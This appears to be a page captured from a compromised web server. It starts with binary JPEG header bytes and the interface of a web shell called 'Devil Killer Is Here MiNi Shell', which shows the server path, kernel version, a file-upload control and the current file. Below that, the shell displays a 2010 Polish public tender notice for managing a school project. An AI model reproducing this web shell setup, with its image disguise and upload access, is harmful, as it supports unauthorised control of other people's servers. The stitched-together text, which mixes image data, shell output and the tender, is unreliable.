JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100903/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100903/278150-N-2010.html

<p class="kh_header"><b>Skarżysko-Kamienna: WYBÓR KADRY ZARZĄDZAJĄCEJ PROJEKTEM 
PT.: Dziś zdobywam wiedzę - jutro EUROPĘ</b><br>
<b>Numer ogłoszenia: 278150 - 2010; data zamieszczenia: 03.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe , ul. Konarskiego 20, 26-110 Skarżysko-Kamienna, woj. świętokrzyskie, tel. 041 3953007.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staszicliceum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYBÓR KADRY ZARZĄDZAJĄCEJ PROJEKTEM 
PT.: Dziś zdobywam wiedzę - jutro EUROPĘ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. PRZEDMIOTEM ZAMÓWIENIA JEST:
powierzenie obowiązków Kierownika Projektu (część 1), Koordynatora ds. organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej (część 2) oraz Koordynatora ds. sprawozdawczości finansowej (część 3) w Zespole Zarządzającym Projektem pn.: Dziś zdobywam wiedzę - jutro EUROPĘ, współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet  IX, Działanie 9.1, Poddziałanie 9.1.2.
2. Dane dotyczące projektu pn. Dziś zdobywam wiedzę - jutro EUROPĘ, współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki:
- miejsca realizacji projektu:  III Liceum Ogólnokształcące im. St. Staszica w Skarżysku-Kamiennej, ul. Ekonomii 7, Skarżysko-Kamienna
 - Biuro Projektu:  III Liceum Ogólnokształcące im. St. Staszica w Skarżysku-Kamiennej, sala nr 10,
- planowany termin realizacji projektu: od dnia zawarcia umowy do 31.07.2012.r., z zastrzeżeniem pkt XXII ppkt 6 lit   e) SIWZ,
- liczba uczestników projektu: 250 ,
- zakres zajęć pozalekcyjnych : językowe, matematyczno-przyrodnicze, informatyczne,
- liczba godzin do zrealizowania zajęć pozalekcyjnych: 1736 godzin.
3. Termin płatności (dotyczy wszystkich części przedmiotu zamówienia) - płatności częściowe, 45 dni kalendarzowych od dnia dostarczenia Faktury VAT do siedziby Zamawiającego, jednakże nie wcześniej niż trzy dni robocze od otrzymania przez  Zamawiającego na rachunek bankowy , środków finansowych pochodzących z EFS i budżetu państwa.
4. Szczegółowy opis warunków płatności i realizacji usług został zawarty w odpowiednim dla danej części Projekcie umowy - zał. nr 4a, 4b, 4c do SIWZ.
5. Miejsce realizacji usług (dotyczy wszystkich części przedmiotu zamówienia): III Liceum Ogólnokształcące im. St. Staszica w Skarżysku-Kamiennej ul. Ekonomii 7. 
6. Ilekroć w niniejszej SIWZ i załącznikach do SIWZ przedmiot zamówienia został określony poprzez wskazanie znaków towarowych, patentów lub pochodzenia, intencją Zamawiającego było przedstawienie typu materiału bądź technologii. W takim przypadku Zamawiający dopuszcza składanie ofert równoważnych, ale jedynie takich, które gwarantują zachowanie tych samych norm, parametrów i standardów. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego jest zobowiązany wykazać w formie opisowej, że oferowane przez niego usługi spełniają wymagania określone przez Zamawiającego w SIWZ i jej załącznikach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 79.42.10.00-1, 79.21.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 22.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A) Dotyczy części 1, pn. Kierownik projektu -
a) Zamawiający uzna za spełniony warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli Wykonawca: 
a1) wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (w przypadku świadczeń okresowych lub ciągłych - również wykonuje; w przypadku jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) uczestniczył w realizacji minimum 2 projektów, z których w co najmniej jeden był współfinansowany ze środków EFS (Europejskiego Funduszu Społecznego) na stanowisku Kierownika/Managera Projektu, z których wartość co najmniej jednego wynosi nie mniej niż 200.000,00 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum. 
B) Dotyczy części 2, pn. Koordynator ds. organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej 
a) Zamawiający uzna za spełniony warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli Wykonawca: 
a1) wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (w przypadku świadczeń okresowych lub ciągłych - również wykonuje; w przypadku jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) uczestniczył w realizacji minimum  1 projektu współfinansowanego ze środków EFS (Europejskiego Funduszu Społecznego), z którego wartość  wynosi nie mniej niż 200.000,00 zł brutto, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum. 
C) Dotyczy części 3, Koordynator ds. sprawozdawczości finansowej 
a) Zamawiający uzna za spełniony warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli Wykonawca:
a1) wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert (w przypadku świadczeń okresowych lub ciągłych - również wykonuje; w przypadku jeżeli okres prowadzenia działalności jest krótszy - w tym okresie)  uczestniczył w realizacji minimum 1 projektu współfinansowanego ze środków UE (Unii Europejskiej), którego wartość wynosiła nie mniej niż 200.000,00 zł brutto, z podaniem jego wartości, przedmiotu, dat wykonania i odbiorców, oraz załączy dokumenty potwierdzające, że te usługi zostały wykonane lub są wykonywane należycie.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A) Dotyczy części 1, pn. Kierownik projektu -
b) Zamawiający uzna za spełniony warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca:
- wykaże, że dysponuje lub będzie dysponował osobą zdolną do wykonania zamówienia posiadającą odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne dla terminowego i na odpowiednim poziomie wykonania zamówienia,
tzn. b1) wykształcenie wyższe (dowolne), doświadczenie w prowadzeniu i pozyskiwaniu środków na działalność  edukacyjną na stanowisku kierowniczym  min 5 lat , zna znajomość specyfiki pracy szkoły;
b2) znajomość zagadnień związanych z Europejskim Funduszem Społecznym potwierdzona minimum dwoma certyfikatami/ zaświadczeniami lub innymi dokumentami potwierdzającymi ukończenie szkoleń z zagadnień EFS, w tym dotyczących edukacji.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum.
B) Dotyczy części 2, pn. Koordynator d/s organizacji zajęć pozalekcyjnych i sprawozdawczości merytorycznej
b) Zamawiający uzna za spełniony warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca:
- wykaże, że dysponuje lub będzie dysponował osobą zdolną do wykonania zamówienia posiadającą odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne dla terminowego i na odpowiednim poziomie wykonanie zamówienia,
tzn. b1) wykształcenie wyższe pedagogiczne, doświadczenie zawodowe min.  5 lat w placówkach oświatowych , zna znajomość specyfiki pracy szkoły,  bardzo dobra znajomość obsługi programów biurowych  (Pakiet Office) potwierdzona świadectwem, zaświadczeniem lub certyfikatem.
b2) znajomość zagadnień związanych z Europejskim Funduszem Społecznym potwierdzona minimum jednym certyfikatem / dyplomem  lub innymi dokumentami potwierdzającymi ukończenie szkoleń z zagadnień EFS.

 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum. 

C) Dotyczy części 3, Koordynator ds. sprawozdawczości finansowej -
b) Zamawiający uzna za spełniony warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca:
- wykaże, że dysponuje lub będzie dysponował osobą zdolną do wykonania zamówienia posiadającą odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne dla terminowego i na odpowiednim poziomie wykonania zamówienia,
tzn. b1) wykształcenie minimum średnie ekonomiczne, doświadczenie na stanowisku specjalisty ds. księgowości min. 5 lat, znajomość programów księgowych , wykorzystanie w pracy pakietu OFFICE
b2) ukończenie szkoleń   dotyczących sprawozdawczości projektów potwierdzone zaświadczeniem lub certyfikatem;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony wspólnie przez członków Konsorcjum.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca musi również załączyć do oferty: 
a) prawidłowo wypełniony i podpisany przez Wykonawcę Formularz Ofertowy (zał. nr 1a,1b, 1c do SIWZ); 
Wszystkie pola puste i wykropkowane musza być wypełnione przez Wykonawcę;
Jeżeli Wykonawca składa ofertę na więcej niż 1 część Formularz należy złożyć dla każdej części oddzielnie.
b) w przypadku gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być dołączone stosowne upoważnienie lub pełnomocnictwo (W FORMIE ORYGINAŁU LUB KOPII POŚWIADCZONEJ ZA ZGODNOŚĆ Z ORYGINAŁEM PRZEZ NOTARIUSZA (SĄD OKRĘGOWY W WARSZAWIE - SYGN. AKT V CA 85/07), określające zakres czynności do których jest umocowany;
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie jednego egzemplarza dokumentu do wszystkich części tylko w sytuacji, kiedy Formularze Ofertowe wraz z załącznikami stanowią jedną trwale spiętą dokumentację.
c) prawidłowo wypełnione i podpisane przez Wykonawcę lub osobę upoważnioną Oświadczenie o podwykonawcach - załączyć w przypadku udziału podwykonawców (zał. nr 3 do SIWZ);
Jeżeli Wykonawca składa ofertę na więcej niż 1 część oświadczenie należy złożyć dla każdej części oddzielnie.
d) w przypadku złożenia oferty przez spółkę cywilną należy załączyć oświadczenie o woli współpracy Wykonawców wspólnie składających ofertę;
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie jednego egzemplarza oświadczenia do wszystkich części tylko w sytuacji, kiedy Formularze Ofertowe wraz z załącznikami stanowią jedną trwale spiętą dokumentację.
e) oświadczenie o woli współpracy Wykonawców wspólnie składających ofertę (Konsorcjum), ustanawiające pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego (wyznaczenie Lidera); 
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie jednego egzemplarza oświadczenia do wszystkich części tylko w sytuacji, kiedy Formularze Ofertowe wraz z załącznikami stanowią jedną trwale spiętą dokumentację.
f) Zamawiający zaleca załączyć do oferty podpisany lub zaparafowany przez Wykonawcę lub osobę uprawnioną do reprezentowania Wykonawcy - Projekt Umowy (zał. nr 4 do SIWZ); zaleca się wypełnienie Projektu Umowy w części dotyczącej Wykonawcy i jego oferty; nie jest wymagane załączanie Projektu umowy do oferty; W sytuacji braku w ofercie Projektu umowy Zamawiający uzna, że Wykonawca zapoznał się z jego treścią i akceptuje zawarte w nim warunki (na podstawie oświadczenia zawartego w pkt 6 Formularza ofertowego);
Jeżeli Wykonawca składa ofertę na więcej niż 1 część Projekt umowy zaleca się złożyć dla każdej części oddzielnie.
Uwaga: W przypadku Wykonawców występujących wspólnie zastosowanie mają przepisy ustawy zawarte w art. 23 ust. 1 - 4 ustawy P.z.p.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany zawartej umowy (na pisemny wniosek Stron umowy):
a) zmiana podwykonawcy oraz zakresu realizacji zamówienia przez podwykonawcę;
b) zmiana wynagrodzenia brutto w przypadku urzędowej zmiany stawki podatku VAT,
c) w przypadku braku środków na realizację zadania lub wystąpienia innych nie przewidzianych przyczyn Zamawiający dopuszcza możliwość przesunięcia w formie aneksu do umowy ostatecznego terminu realizacji przedmiotu umowy lub rezygnacji z części usług, 
d) zmiana sposobu/zasad dokonywania rozliczeń, w przypadku zmiany obowiązujących w tym zakresie przepisów,
e) zmiana terminu realizacji usługi, w przypadku zmiany terminu realizacji szkoleń językowych stacjonarnych i e learningu.
Jeżeli występują zmiany w strukturze organizacyjnej Zamawiającego lub Wykonawcy, dotyczące określonych w umowie nazw, adresów, podległości, rachunków bankowych, Strony niezwłocznie informują pisemnie o tych zmianach. Zmiany takie nie wymagają formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.staszicliceum.pl;  http://www.spskarzysko.bip.doc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> III Liceum Ogólnokształcące im. St. Staszica w Skarżysku-Kamiennej
Ekonomii 7  26-110 Skarżysko-Kamienna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.09.2010 godzina 10:00, miejsce: III Liceum Ogólnokształcące im. St. Staszica w Skarżysku-Kamiennej ul. Ekonomii 7
Pokój nr 4   26-110 Skarżysko-Kamienna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007 - 2013, Priorytet IX, Działanie 9.1, Poddziałanie 9.1.2.
2. Postępowanie o udzielenie zamówienia z zastrzeżeniem wyjątków określonych w ustawie prowadzi się w formie pisemnej (art. 9 ust. 1 ustawy P.z.p.). w języku polskim (art. 9 ust. 2 ustawy P.z.p.).
3. Wszelkie pytania dotyczące postępowania o udzielenie zamówienia należy kierować pisemnie, w godzinach urzędowania Zamawiającego, w dni robocze, na adres: III Liceum Ogólnokształcące im. St. Staszica w Skarżysku-Kamiennej, Ekonomii 7, 26-110 Skarżysko-Kamienna,  fax (41) 2523340., e-mail: sko_3lo_sekr@interia.pl 
Uwaga: W przypadku dostarczenia dokumentu po godzinach urzędowania Zamawiający uzna, że zapoznał się z jego treścią w następnym dniu roboczym.
4. Zamawiający dokona otwarcia ofert w dniu  13.09.2010 o godz. 10:25, w swojej siedzibie.
